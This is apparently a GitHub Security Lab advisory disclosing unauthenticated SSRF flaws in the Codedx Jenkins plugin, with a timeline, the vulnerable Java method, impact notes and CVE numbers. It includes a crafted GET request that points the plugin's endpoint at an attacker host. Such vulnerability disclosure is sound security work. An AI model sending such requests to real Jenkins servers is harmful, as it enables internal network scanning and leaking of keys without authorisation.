GHSL-2023-072: Several Server-Side Request Forgery (SSRF) vulnerabilities in the Codedx Jenkins plugin - CVE-2023-2195, CVE-2023-2631

Coordinated Disclosure Timeline

• 2023-04-11: Issue reported to the Jenkins Security Team.
• 2023-05-16: Issue is fixed and advisory publish.

Summary

Several Server-Side Request Forgery (SSRF) vulnerabilities were found in the codedx-plugin. The vulnerabilities resides in the org.jenkinsci.plugins.codedx.CodeDxClient#doFillProjectIdItems, doCheckSelfSignedCertificateFingerprint and doCheckUrl methods and can be exploited without authentication. An attacker can leverage this vulnerabilities to send requests to arbitrary hosts.

Product

Codedx Jenkins plugin

Tested Version

v2.4.4-RC1

Details

SSRF in org.jenkinsci.plugins.codedx.CodeDxPublisher (GHSL-2023-072)

The doFillProjectIdItems, doCheckSelfSignedCertificateFingerprint and doCheckUrl methods in the CodeDxClient.java file lacks proper validation and sanitization of user input for the url parameter, allowing a blind exploitation of a server-side request forgery (SSRF).

Affected source code: CodeDxClient.java

public ListBoxModel doFillProjectIdItems(@QueryParameter final String url, @QueryParameter final String selfSignedCertificateFingerprint, @QueryParameter final String key, @AncestorInPath AbstractProject project) {
    ListBoxModel listBox = new ListBoxModel();
    CodeDxClient client = buildClient(url, key, selfSignedCertificateFingerprint);
    try {
        final List<Project> projects = client.getProjects();
        ...
    }
    ...
}

In order to exploit the vulnerability, an attacker may send the following crafted request:

GET /jenkins/descriptorByName/org.jenkinsci.plugins.codedx.CodeDxPublisher/fillProjectIdItems?url=http%3A%2F%2Fattacker.com&key=FLAG&selfSignedCertificateFingerprint=asdf HTTP/1.1
Host: localhost:8080
Connection: close

This vulnerability was found using CodeQL’s SSRF Java query.

Impact

The vulnerability allows attackers to send requests to arbitrary hosts/paths without authentication. Since the attacker is not able to read the response, the impact of this vulnerability is limited. However, an attacker should be able to leverage this vulnerability to scan the internal network.

CVE

• CVE-2023-2195 (missing CSRF protection)
• CVE-2023-2631 (missing permission check)

Resources

• SECURITY-3118

Credit

This issue was discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2023-072 in any communication regarding this issue.